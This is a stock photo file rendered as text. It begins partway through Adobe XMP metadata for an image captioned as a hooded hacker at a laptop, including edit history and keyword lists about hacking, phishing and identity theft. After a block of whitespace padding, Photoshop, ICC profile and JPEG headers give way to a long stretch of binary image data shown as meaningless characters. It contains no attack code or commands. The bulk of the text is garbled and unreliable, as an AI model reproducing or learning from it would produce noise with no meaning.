               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurveBlue>
             <crs:ToneCurvePV2012>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurvePV2012>
             <crs:ToneCurvePV2012Red>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurvePV2012Red>
             <crs:ToneCurvePV2012Green>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurvePV2012Green>
             <crs:ToneCurvePV2012Blue>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurvePV2012Blue>
             <photoshop:DocumentAncestors>
              <rdf:Bag>
               <rdf:li>xmp.did:575e95f8-8b0b-5f4b-8f74-e357ec31cb33</rdf:li>
              </rdf:Bag>
             </photoshop:DocumentAncestors>
             <photoshop:Headline>
              <rdf:Alt>
               <rdf:li>hacker in a jacket with a hood with a laptop sits at the table. </rdf:li>
              </rdf:Alt>
             </photoshop:Headline>
             <xapMM:History>
              <rdf:Seq>
               <rdf:li
                stEvt:action="derived"
                stEvt:parameters="converted from image/x-canon-cr2 to image/tiff"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:23b5655a-6741-a247-913b-5219ad3a5ef3"
                stEvt:when="2018-05-07T23:41:32+03:00"
                stEvt:softwareAgent="Adobe Photoshop Camera Raw 9.8 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:a0ae3901-555f-994a-9dcd-059a864d1904"
                stEvt:when="2018-05-07T23:42:01+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="converted"
                stEvt:parameters="from image/tiff to application/vnd.adobe.photoshop"/>
               <rdf:li
                stEvt:action="derived"
                stEvt:parameters="converted from image/tiff to application/vnd.adobe.photoshop"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:575e95f8-8b0b-5f4b-8f74-e357ec31cb33"
                stEvt:when="2018-05-07T23:42:01+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:d3996ad5-113c-a74b-9245-1f3a02eefa12"
                stEvt:when="2018-05-08T16:57:53+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="converted"
                stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/>
               <rdf:li
                stEvt:action="derived"
                stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:0dcc8af0-dbc1-014c-b748-bda8a6854bd0"
                stEvt:when="2018-05-08T16:57:53+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:9e76d847-c3b6-7148-b311-431630914674"
                stEvt:when="2018-06-03T23:05:45+03:00"
                stEvt:softwareAgent="Adobe Bridge CC (Windows)"
                stEvt:changed="/metadata"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:e78942ac-bb59-1c4e-8f8f-66032e78d7ae"
                stEvt:when="2018-06-03T23:07:25+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:850b66c5-928c-764d-9853-2b1637019deb"
                stEvt:when="2018-06-03T23:15:58+03:00"
                stEvt:softwareAgent="Adobe Bridge CC (Windows)"
                stEvt:changed="/metadata"/>
              </rdf:Seq>
             </xapMM:History>
             <xapMM:DerivedFrom
              stRef:instanceID="xmp.iid:d3996ad5-113c-a74b-9245-1f3a02eefa12"
              stRef:documentID="adobe:docid:photoshop:185649bf-5237-11e8-9e13-a05ef46db9cb"
              stRef:originalDocumentID="B5831E1C2251FE2C015A9161D841CB07"/>
             <dc:description>
              <rdf:Alt>
               <rdf:li xml:lang="x-repair">hacker in a jacket with a hood with a laptop sits at the table. Added identity theft icons, account hijacking, bank data theft and world map.</rdf:li>
              </rdf:Alt>
             </dc:description>
             <dc:title>
              <rdf:Alt>
               <rdf:li xml:lang="x-repair">hacker in a jacket with a hood with a laptop sits at the table. </rdf:li>
              </rdf:Alt>
             </dc:title>
             <dc:subject>
              <rdf:Bag>
               <rdf:li>data</rdf:li>
               <rdf:li>danger</rdf:li>
               <rdf:li>internet</rdf:li>
               <rdf:li>code</rdf:li>
               <rdf:li>concept</rdf:li>
               <rdf:li>privacy</rdf:li>
               <rdf:li>virus</rdf:li>
               <rdf:li>network</rdf:li>
               <rdf:li>security</rdf:li>
               <rdf:li>computer</rdf:li>
               <rdf:li>web</rdf:li>
               <rdf:li>identity</rdf:li>
               <rdf:li>attack</rdf:li>
               <rdf:li>dark</rdf:li>
               <rdf:li>crime</rdf:li>
               <rdf:li>man</rdf:li>
               <rdf:li>table</rdf:li>
               <rdf:li>theft</rdf:li>
               <rdf:li>cyber</rdf:li>
               <rdf:li>hacker</rdf:li>
               <rdf:li>online</rdf:li>
               <rdf:li>anonymous</rdf:li>
               <rdf:li>information</rdf:li>
               <rdf:li>software</rdf:li>
               <rdf:li>type</rdf:li>
               <rdf:li>secure</rdf:li>
               <rdf:li>laptop</rdf:li>
               <rdf:li>professional</rdf:li>
               <rdf:li>hack</rdf:li>
               <rdf:li>password</rdf:li>
               <rdf:li>hacking</rdf:li>
               <rdf:li>safety</rdf:li>
               <rdf:li>enter</rdf:li>
               <rdf:li>criminal</rdf:li>
               <rdf:li>prevention</rdf:li>
               <rdf:li>notebook</rdf:li>
               <rdf:li>phishing</rdf:li>
               <rdf:li>using</rdf:li>
               <rdf:li>worm</rdf:li>
               <rdf:li>work</rdf:li>
               <rdf:li>programmer</rdf:li>
               <rdf:li>trojan</rdf:li>
               <rdf:li>hood</rdf:li>
               <rdf:li>illegal</rdf:li>
               <rdf:li>system</rdf:li>
               <rdf:li>antivirus program</rdf:li>
               <rdf:li>person</rdf:li>
               <rdf:li>fraud</rdf:li>
               <rdf:li>background</rdf:li>
               <rdf:li>desk</rdf:li>
              </rdf:Bag>
             </dc:subject>
             <MicrosoftPhoto_1_:LastKeywordXMP>
              <rdf:Bag>
               <rdf:li>data</rdf:li>
               <rdf:li>danger</rdf:li>
               <rdf:li>internet</rdf:li>
               <rdf:li>code</rdf:li>
               <rdf:li>concept</rdf:li>
               <rdf:li>privacy</rdf:li>
               <rdf:li>virus</rdf:li>
               <rdf:li>network</rdf:li>
               <rdf:li>security</rdf:li>
               <rdf:li>computer</rdf:li>
               <rdf:li>web</rdf:li>
               <rdf:li>identity</rdf:li>
               <rdf:li>attack</rdf:li>
               <rdf:li>dark</rdf:li>
               <rdf:li>crime</rdf:li>
               <rdf:li>man</rdf:li>
               <rdf:li>table</rdf:li>
               <rdf:li>theft</rdf:li>
               <rdf:li>cyber</rdf:li>
               <rdf:li>hacker</rdf:li>
               <rdf:li>online</rdf:li>
               <rdf:li>anonymous</rdf:li>
               <rdf:li>information</rdf:li>
               <rdf:li>software</rdf:li>
               <rdf:li>type</rdf:li>
               <rdf:li>secure</rdf:li>
               <rdf:li>laptop</rdf:li>
               <rdf:li>professional</rdf:li>
               <rdf:li>hack</rdf:li>
               <rdf:li>password</rdf:li>
               <rdf:li>hacking</rdf:li>
               <rdf:li>safety</rdf:li>
               <rdf:li>enter</rdf:li>
               <rdf:li>criminal</rdf:li>
               <rdf:li>prevention</rdf:li>
               <rdf:li>notebook</rdf:li>
               <rdf:li>phishing</rdf:li>
               <rdf:li>using</rdf:li>
               <rdf:li>worm</rdf:li>
               <rdf:li>work</rdf:li>
               <rdf:li>programmer</rdf:li>
               <rdf:li>trojan</rdf:li>
               <rdf:li>hood</rdf:li>
               <rdf:li>illegal</rdf:li>
               <rdf:li>system</rdf:li>
               <rdf:li>antivirus program</rdf:li>
               <rdf:li>person</rdf:li>
               <rdf:li>fraud</rdf:li>
               <rdf:li>background</rdf:li>
               <rdf:li>desk</rdf:li>
              </rdf:Bag>
             </MicrosoftPhoto_1_:LastKeywordXMP>
            </rdf:Description>
           </rdf:RDF>
          </x:xmpmeta>
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
                                     
          <?xpacket end="w"?>ÿí®Photoshop 3.08BIM‘Z%G@hacker in a jacket with a hood with a laptop sits at the table. 720131229<005353+0000xhacker in a jacket with a hood with a laptop sits at the table. Added identity theft icons, account hijacking, bank data theft and world map.i@hacker in a jacket with a hood with a laptop sits at the table. datadangerinternetcodeconceptprivacyvirusnetworksecuritycomputerwebidentityattackdarkcrimemantabletheftcyberhackeronline	anonymousinformationsoftwaretypesecurelaptopprofessionalhackpasswordhackingsafetyentercriminal
          preventionnotebookphishingusingwormwork
          programmertrojanhoodillegalsystemantivirus programpersonfraud
          backgrounddeskÿâ@ICC_PROFILE0ADBEmntrRGB XYZ ÏacspAPPLnoneöÖÓ-ADBE
          cprtü2desc0kwtptœbkpt°rTRCÄgTRCÔbTRCärXYZôgXYZbXYZtextCopyright 1999 Adobe Systems IncorporateddescAdobe RGB (1998)XYZ óQÌXYZ curv3curv3curv3XYZ œO¥üXYZ 4 ,•XYZ &1/¾œÿÛC
          
          
          
          
          
          #%$""!&+7/&)4)!"0A149;>>>%.DIC<H7=>;ÿÛC
          
          ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;ÿÀÚ"ÿÄ	
          ÿĵ}!1AQa"q2‘¡#B±ÁRÑð$3br‚	
          %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖרÙÚáâãäåæçèéêñòóôõö÷øùúÿÄ	
          ÿĵw!1AQaq"2B‘¡±Á	#3RðbrÑ
          $4á%ñ&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz‚ƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖרÙÚâãäåæçèéêòóôõö÷øùúÿÚ?ñÜðlSA޾µe„~_½A´T's¢pqê4;zё½±Ö´qïHBŠdY†F6öÇZ7m펴»F3FьÐ;1	c ìh$:Ô )£
          N;ÐbÛғwÌO­;`ôëKåûQt²c8Å.àHcÁ¥íI… ,Ðõ©ä¡»Ò‘TpqÅZ‘bòAqRÚLޝ7(·ržá÷»ã¥Ü2[¹)vg»Å=­!¥†K§·¥.FK.I=½)ÁrEJ/jMšF›{²„%†NOJ*tÉÉÏáVÌ
          {SM¨©çF¯QlT%BSœœô¦U©!@ÆséBD¹Œç¦*ù•Œ]	9X…J•
          Ç9éO,®Fì®=;T­8ëӚT‰]ÀöÏZ—%¹¬hÎü£p¬UÉÁ§­9vå+Ûj³&qힴô¶ŒÈ§^k'4vÇ
          Q¾„m:¢£ª:c­Wk€Ç~NvãïZ×Ö¶þ@Ø9œÖO’7Œ×'Sq’¹XÊU©MBèedÉ,WÇ~•0»ŒãïŒb¡HÆ0prqͶxÆ98çÒ­¨³–­‹ÑÏîe<·lt©7*–eä“Óҩڀ§|r{֊"²‚ZçšQg±†”êÆïr0ʤ‘ÎOåJ¬©ÓžrxíRˆ•— q@HȝÑ֩̉YSŒóÅ*•Q·998©jFqFÄÛ»c4]
          S’!l
          qÉ5ÍÄaœg‡Ï¥:b
          ^ëÎ*“Æ.Ý1ž¼ãéZÂ)êÏ?ZQN1 wQTä/|u&¦™ö¤>ªÄãò©­¡‰eVar3ÏO­hêñY,Jb€3ìkITJIX奄œ¨Î£’[~ðÆ0‘"%–ÜÀàŒ`u¡dŽ#•%²àôÆ=¡Uê½ñÁÎ¥
          ®8ÎNyô«¼N^J‹¶Ÿ€Ä’8†Õ%ƒ7<cýzXåHv¨%'qǨÅ8 ·;Žyô Â»”mÎî˜9¢ñcQ«­¡<7q"'pç'´Ï¶F•œ©,ò*?%wÆKr<Ə!K’FAŒ}j9boíkÚÊÝ¿àÓ#/qÛ·±ß9¦yˆWÊÉÛ·±ß9©¾Ëócolç<c×4†Ü*W’OúÕ^&.g«^]~â#"2y[° 6;ÿ]'š¿hFä*àtì*_%w#FI'øÑä©f\`¯\;ć
          ŽßÖÅxœG"±äÍK¤lª¤¸Ý’qŽ1Šp…I#ÚprqÍX°Šp<Á€xç҉IY²¨P¨ç¦·þ¿"7*¸ŒeÎN:db˜"ˆÉ;pAlzÿú«vþ1ƒÉÆ9õ¬ViÈgž¿JÊæG~+
          èÊ×¹(Š#ݑ´‚ØïœÓ|ÄÙåg¸ÝŽùÍ=bW€àôç“VÅZ-ãÓ=kG(­Î(Ñ«SáKoÀ¥æ/ÉژÅ26:±è5ml÷sŽ1ž¼â¬Ç`w0÷¡ÔŠ`ëÍéêgۆósŽ•>_-Ó~•¨¶ñƹÅ8Æ g›­}ŽÚysŠ\Ïm¯¸ÌKlš”ڏ-”u$Ñ1¨ê)j;wÅOµfŸPŠV3ž7IžJ㪭^ቭ‰ VÀõ8â¢6qð1œôÅ\j®§5lÛ÷L芰
          Č6zS¤qç;2+RÖÎ(Þ2
          :úÎÜÉû±G¶5eµ}5ÖægºàP¤p{Ž?:Ðk4è:ã5Úílc¶kUR,àž¬
          À€Œ;œb€FÆÉ©þÎrFޔôµÉ Œc®j¹ÑšÃÔob¨#Ë#¾sI‘³óš¶m9>ÔÃnyã§Ч<=EЮHòÀïš	Tw©„YþøæGŸá§ÌŒÝ9•QéJ
          ü¹þ֞œQ°œSº„ˆÁá³ÔÓЍÁ»ÒƒÅMn‰»/ғjÅÓ§'$Šìx#¾hÜ>÷|t©î7ezTE@¡4Ч44‘ÉîGJjœԅ@íAP;S¹.÷GziÆÓʁڍ¢‹ƒ‹#¢¤Ú?:6Œzw'‘È廑җpÉaÔö¥Ú3FÑH«1¤ŽqހF{S¶ŒÑ´f‹ŠÌD?1÷¥Âúþ•$!2wT„Eš–õ66ã{‚9éM_—ƒÜÐ~í2­#+1ã€ëHxP;Óh ›è<õ-݈۬⛊zj
          Zˆ«¸ïR„Ͻ}©Ø¨lè„ÜP wæ”;â›KRl¬£Sv
          u N)€Œ­Ø
          q‹€Ý±IА”T¶ÍcÛažXÉnØ¥ò×,݈£¸¢ìj1ì!ˆÍØôüé¢3yŒ{óRKŠWe{8¾‚#ÉÝݸ¥Më÷¸ËRíqNÅ&Í#C±Æu$þS¡„…
          Üšàj6WŠ.ÞÂä„äɚ c	Àm¦¢Ž-©±ˆ
          ´÷÷éPù¥›“Lp
          R‹ØÎu¡~d¼‰¤o“ËSómõ÷éBHßqNXï×Ú«;ŽjÕ²ÆÇsM¤‘9ʤմ4Xù°…ê@ªwpï\&	gž¼T×R ­g4ÎÀ¯Zʜ^èô1µ —$Ö£äýîBH~yëÀæ‰?}÷áÎyúsUñšP2zf·å<‡V÷ºÜЎ>D‘NXçóÎjòŒ”aÀSÏ·5VÔ~èT¤íúW$îݏ¡Ã¨ÂÖܰ¤ƒžzS7.Qò¯^zVl÷˜8Z¬Ó»÷'éU-™UÌád¯ýÀ5
          ҆GmQóô¨¾ÖIY8Øžzt¬¼æŠÙQHó¥™Te×}ÎÒäl1àsßÅ4ñ$“dld㞽8¨¡T'çâ­2Û ¡Ùh樜›K¯ÌŒ|“K#UÈÛÏ^A©ço-Ý²¬Ão9Ï9ª-00*K¡¼cŠ9uBf¡+/éßüÇLj]šFg9ëÏZH¿q!³ñϱçõªØÇlQŒqŒ¾S^Ö²Ûõ,Åû•T€ÌÇôã¢1åÅå1
          í»ôã]#y"#3Š5}t‡HVI¤D%±°õ¡ÄQ­k+Z	mhÄMÃoÃ8ÿ
          ½ªGŒãvÓüúQ¸…8Áã äT7+ rk’NR•‘ïэ4”実kË_/ËݎŸJG…3vÿUS´‘åË7J·Pââ÷:©Ô…X_—M¾D[FÈbn{õÅAqk¾-‘°fR3Ï^1S\ۙGª¥¬¤á‰Åk¥îyøˆÞNÏ~Â<fãrFA*üó׀3úTŸgyäù?†BOéÏéVc·XÇNjdQ¸Ru-±tð|Îóë¹Í«É$l­€­Ï=9ëQ-¦é#~RsíÎjìã‘Qb³ŒÝŽÚ¸z~Ѷ¿­¢4‰(áTsíDQ2:6~@˜?—J“bŸ3%R‚wK̆Q²a(ÆÝ˜ý1ŠœsºOáeâ˜Ñ‚rE.1Û=P¢œdûn=¸gá#z8Wg<©<{óQãڌR±n^C€ØInAa~zÒ(Ø~b9aÿë¦ãړìO5ºQ³† dñþ4Õ@Và’)¸¤Å;Ín„‘»TðN
          $l?xƒLAóŠYGÍK¨_÷cqòìþ-¿×¥4¨+³¾ßëIŠLUœíù
          TØ1#‚£’1øÒb“ÈoÈVQÉ*Gø&)1TŒäïÐCôÇ
          HʬÁ‡@y Šn)™;>‚”²·@:Ó|¥Ê·`)ؤÅUًŒ{
          Û»b”F7níŠ(^´îÉQöñ|Å»LhÈ,ݍLÝi§¥RlÊpÙ	R¥‰èOõ¤i$ô&•²Ji`GJ³•Ù0_—¯­òà2i”UX˚Ãǩ́·¹™IEƒ˜“¶Þø£øv÷ÅGE0óÓo|PyG\
          eX9‰G<¢¼
          ‰:ÐiXÑIØxåFy暼€O'œPI*9¦ä“œÐœ‡W=ðqKü9ïŠfNsžiFIÎy¦$ÉP|¹=qRp=ñPïÇ~i‡®y¨³fê¤b‰Ë€	ïÆiLG^3U÷ç'4›ˆ9Ï4ùIuÙhɎsÍ;?ÝõªˆèM9$e<Nƾº–ÏÇ­@éšb±ÇZp$µŽµ$8uP:“²ŽØ¨A#ŒÔ„€T³X=uÇm´îäÚ`'íK“ŒgŠ
          MîÀôŒ–
          Ð~”Ì’1ž)rHÁ<Tš¦‰e˜7@E7Ìïÿxc4d‘‚j„y9'’»Ô©ÍÆ7Š'i1»ŸŸŒý*8ÉuÜÇ,	۟\Tn$ÏÌIÇJiw$Ç#¥t(ö<™Vw÷®M%‰ËÛIúT¶Ñ™U\ä°VÁÿ?Uìàî$ކ´­÷IÝëQ=хJ¤õÛþwف‡wñí8=ñš­ h`Nýƒ'¾3Ww6wdæ£1n—ÌÜsëXÆVÜôªÑRK‘kýkêErÏö}ù!ö.Oùü*¼„¬[Á!ÎÝÄuéWoÃ$jÊH8ëYbGX1ÜzŸZ֞±¹Ã~ί+íý2y‰DfCµ‹
          Øú,ÄÆ	åc'͏\?<Õu‘Ô’¬A=O­*ÈèIV žµ|§#¬ÿ«nh­É…•S£HAǯRÜ]Ѭ'†r8ïÍf¬Ž™Úäg¯4‹# !X€zâ£Ù+ÜéþЗ+ô½“kíé¸â¤VdµÜ„†2`‘ôâ¡§$v1\õÅlևŸÚM޹\HÇ=20Š¡ašN´P––&R¼Ü¬]S¾IVSò¬Š=¹Çò¢2Ò³‰‰ J¼Üôª­#¸˜:JÒÈàrØé“QÈuýa]wßÒå»bÒ1ó~b$ùsëƒÇò©X—HÙþfvç×nPódw]ÎNÕ©Vk™¢E,ÏÛª}㢝uìŸ[~:õô	/;Îì'“Óüj՞ŸsuÊÊS€•Áã§>ýëFÖÊÎÝ“3Ot>ëcåSì?­]ó£fiãrF£;ÎosßéZª}Î9bm¤­µü
          ØG*‹)ûCšV^vžôIaÄ6ÝÄ9CÔóÚ¬È$Û”g'pG§Ò«Ü³ ExØs½zÂ´JǤäîÈA±#?sž9õª³ZO煄…(ۙK›üŽÔù}²2Ûð§ƒàþTJNb¸û<J3ŒgùÒqOré֝5h½#"fi\1ÆEOo:É:®:š•ãÌæŠäü`{P/–$U gØ×%Z|ªç½Æ:’Qm'Û¹4yprwqŸ¥	ó[’ã?JŒ³62Äâ‚ÌÄđҹ,}
          šB¶L@žNN	©ýh_áÙÓð¨X³u9§#6Bäã҆´eïܬ+ü;:~å¤S÷GéK;1ÂäãÒ¢,Ä`’E$´.¤’“CÏ,êßtøsJ¿3°n@aÁíÍFYˆÁ$Š1À$œUXϝO›ïó‡ã4‰ócw$7úS™±’N(,͌’qE‰çC“,¹<N3ô¡yPǖàÓ1 ’r:PY‰ÎNE;ò÷ãIü¿‹o_ƛ¹·nÉÍ&æÝ»'>´X‡%ý~cÜ-ü[G?#ñáÃ2i»›;²sI¹ÎNM;æ‰zdŽ	#?•%ÆW%x9çJdeƒç''­,¥•Î	¢Ú”ä6$™SòðKsŠFùH	À,zSAaœ3H—8$fªÇ;’ü¬¡z?4˜Ã¢ºZhf€p)2À`J«¹!GÞUþ´ŸÄøvÿJL°Ï”™8Æx§c'$ï2ÿÚFêãø@â‚N1ž*‰YSnx«I¶cR¢Œ[c÷mAƒÎê€?)þ.Õ@Jã8b3@•×£Zû3ÎúâìY’M¦@:b£I‰*ÌsÏ^´ø~ÿÖ¯•$aíå)èY݄lÓ|ѐ;m¥‘r0*³†^2qS™µZ’#9-ŽÛi‡ïü;i›Ž1ž(ÉÆ3Åh‘Æê\yûÎAGV`zf™¸‘‚x¤,Oæ‹Ή,Aè
          0’Tç֐±=M“Ô杄åqAùX{PÈi¾¾ô´qsò­ÁøÓihŽSÀúѸúÒ'\QH´ô@8ãŒS@gÅ.ï”JnìcíBhP±KÆ7c·Jnïn=(ÝíÆ1Šbº±Û¥
          ËÇ^ԛ½¸Æ1Fï˜N‚]À±žp)À0pE063ÆAíK¸îÝ@&´`.ì“Þœª<Æ\gҘSÅ»šL¨µtY@¯Í?néÞ£øÆÇJx=}ëzQjÈr•ëRíUÇQÖ¢VÆ8ät5)8AÇ>µçM;XhQ¸í֝´d®;u¦†ã§8ÆiÛ¸éÎ1šNå®QÛA, c
          ;h%”c¡¦nÈ<OSN.Nxž§Ö§SeÊ=Q\•Æ0zÒª,€ù±Ç¥3ÌúNIõ§þèœñRîkÍrƒò…ÃcŠ¢Ñ$’•
          kÅ_28yϵÁ¿r€¼äã¹§4EzP©k/Q¶Ö¨ê wâ­"+Û@Ær~)¡ñ (8 Ë·Ú¦M¶tR…:q°§Uöޏ t§íWã…ä
          «%ڀ°¦h¯˜[ž¢ŽI1<M»6]»Œ<qü ƒÔv¬© XgÚÖƒӓW'»i6.è*„ÒÈ%s"‚ªšÒ’’ÐãÌ*R›æKçòÿ1YQÌ…žƒ9Ïò¡Ñ#S @s·
          y#&£óÉ-¹C)mì1ҏ<’ÛÔ2¶>^˜ÇJÞÌòœéôü½uü¿¤;ÉSt©Ñ
          ŒöÆqM}¯˜!
          ·Üb›æ¿æðŽ(y7(UPŠp=iÙèC”-+yÿÀû‰–4Þ°ìrd·|ã5aV”¨bPJä(ùFà»C÷Å5$ØJ†Vê
          cr…Õ¼ÿ->âC
          5Ò á_™¡¶<- WcÜÿUFÒ»Kæg#±Jòï]¡;ˆÍz<=ëyÿÀû‰Lh×ò_,9QôÍ*"J‹)@»wnUàŠ‹Ïo1dªê1Š_´+±Usòõ=sJÒ-T§w~ý½?à–m K‚’y`Tt'Œ:éá¶û
          îŠØH
          ÌGs“ÓӊÊðý¹“7,Éo‘’<õì=«A¢™$‡ý(7•ßՏҪwædWÄ'OÙÁz¾â›¹Žé>ΤF›®O_Ö¢
          òClms#Ü6{PEÊÚ
          ’»{¥9n’iäl3AÂÂò{}:ýkS€p–)®Œ•Äc?1û§íÞªyo¡,ÆGèª:Žô²@ËAËVaõ#qéüê1p"ÔË匒	.søg¥V‚!+Β—S–ÆqíÖ™û³m*Ï 9È {ӑ^êô®×à¸ÏñÏô4‘˜¡ŠuT%œáBŒ(Ë>TŸg*=AëNVUšUX§BFSiéþEFe•ì×kmU'hîs֔¬‹$Lg#zä’zRt]†H¥edÃ2§µI´#`§­gE4‘0cµü·ãŒg5}d,e~ ×Ÿ^Ÿ+ºØúì³íáÉ?‰~+¸òªªd
          :Ã4઄8PsŒۊÌ$œ€AÅ9%%þeoJçÔöSÉn‘c;‚ƒ“À=¸ÍBʱÿ9=ý*Iå%Žà'8¨¼ÃÎà'<úÒ[Q®f)EBÐr{úQ±Tª‘Ç’~´‚CÜ9È'µ Œp	 žÔõ"ñ*‚ªFwu4lPÁ0FI¤Ž#¡=©<ÂàdORov®B`}Üçß…W%08ÏzMçqŒûP\‘ÐdŒF¤·
          UId
          ÑÁ¤Ø¬Ì€·¡üiBAàdðO­!œð=O­;2\ •ð m<S¯‘È•¤È#däã½46ÜûŒU+ØÆMsÆdw$ÒÈ«æ*áɦDøeŽ‡Ò+íaÀÈJZÜÕ8û1W*˜Ž´Ò«’˜.sïŠ<ÂàdHd8è3ŒgÚªÌçr…¿¯¸iÄ9Æhe\º`|£ƒIŸ—o¾iK’ÔúÕjex*GŒðhÚ®HÀ qA'
          ?»Arz	98ïOR=޿փHXíiíP͖E㌐*flŒ`œœw¦î9¸ªM£
          ‘„•™Iíþ@û@ àÞ£hÀ•¾^g Ç#zT1ÏQ[Flóªáâ•ÑPíùX¯\ä
          “j¬í€qMdè)BÒîÀçŒV‡²v~DêàÄ)³ʜ{TO!
          ÀÆ1MiKcŽ%n\«'yÆpp/˜>^éI»“‘zŠ7Û½*õ9®€`)lgœsK€ŒvÈö⚌dQ¸î-ëLI­`($g&‘†CJғ­¶¬;%qÛ­•ÇA֓w9Æ3Fî:sÜÐ; 8Ú1@ÀŒäÒg€(
          ŽÙÇJuqè,=;Òm¡'ފE«X]¹P;ž”Ì
          ¤÷ü€ ÷À~R=hB•…Ú:gœf£‘ž@Í.áלãnžrF)ê/tL
           Ž¤â‚ g•ëF~P;ç4¥‡ÍŒå¿JA
          ýÜsšR£ðy¤Ý€¸ê)I\g“ùQ¨håõéé?2“Œãšjœ²û²€*`TIØÞ•5'qR ­ŒñŒÓöŽ84½±Š	t“lôTb–ƒ¶Íè*Rƒ`<ã¨÷ÍèjV#`^q޵çM52=Ÿ0¿Jx@~é=qÍ7wÌè½)á‚ýܜœóIܸ¨ßP*6’¤ðpsK³€2w0â‚T)UÏ'<Ӄ¨ÚÇ9QùÔêh”o©O6æbB¨çøN̳±Ù€G¯4žg˜í;[¸íN•¨¸8çÿ]jû3Š*Þôu·æZp[$¯Ç|Ò²íluô¨…B¼…ãñА¶ó»«¹é¦šó$XÁÚ	!›¥5 
          …,CŸjG¸Ž ¬ÙÜ£ëUQRCîŒv>ôF2{Zô ­&Iqn¡6.wíÝíëŠÏH×i’MÁA©5kíˍü—Û·ã¦3UÖEd1ɐ×L’Ôñ±2£9§ë±}™-£òT“Æj‚‡&Bq»hÚ:÷Í2Ç$a_r®A\öÆ*™%ȓr€Û—<cý*c¹µzÑÖ	«tÿ‚Ýc`²±Ë1PT~´uR«#ÎÅF:dþ4­<r°i
          ®XÎG¥z9V“pdb@¯9Å_¼rڍôù~¿â ·\¬lÄHùÆ:­"À§b"G]ΦiÂá$¯»ÌLàÁî?"̀¤»ÌEÀàú=àJŽŸÖš~;ÿV@§Y¼ÆMÎ:g‹öq $¶ìŽ:T‚tdù¼ÅM¸ÇŒg5ñö/œïÏéT®g/gm<ÿK|÷$kuÐ1ówCì(6ÊKƌL‰Œç¡íÇçJÓ¡/ ÝæH¸#SA¸@Ï*nó$ÆAr•O¼ij:ÿZkøíý\kdØÌLG
          ‘ÁíÅÀ²ya‹n•¶ Qúš$–=²y{³)ÉÈû¼çõoG{¸SÑn`@Ïý9ªWfröi¶­·Ëòþ®n½µ¼P¤Buڑ“…ÁúsšjÁªdm„y;~^6‘Üžç¥Fö¨7n•0P§R\ƒþ})«•ü¸Ô‘®	ãþ†¶8	º¤Ö`De!˜¶ì‘ßùS|¶Ù9ÈOÞl!wžø¦E;¼°Aæ»pUº©ßÔÿ:’	v¬X.˞A#©ü1@„‡Rm¡û€ð8éžÝª¼‹æ¬­½=G–¸V·Ó¥Kg…§s <°WßùÔË-µ½´ŸjRXÌSÿ×ï@÷wl‘ÉîUÈs°Çµ1íÖÊîEc‚Tã#$“ÿר¾ÞE¬‘Û!þâÝ~”æ0ÆöÓ»–rã==¨»Œ
          ´mU<ƒØý(’܃˜ø.»ŽãÀ’K·e˜"àÜsëQ²É+®ö<®NzP:Òyožxæ®XJw4R1Úàgíá»dñR@ÄN98'4Z7ÃVt+F¢èk$©+¤ìÁ'Ôb¬¤JH|˜Ï¿\b± ¼Ž	óÁˆÁÉöü+ZÖò)q'n1œsœç5æÔƒ‰öX<U:º6®Xž%vN͹¿J©4‘³€ïÍZºØ2nïëXW#E&ጞ;þ¦•(sc±
          «üÍHÙnÉ+Æ1Ôæ¤1„ÉbHÎ;Õ{w…“h$(Æ?VZEpCdäcžØ¥%fkJJP¾‚Âgy8Î)¾_ï
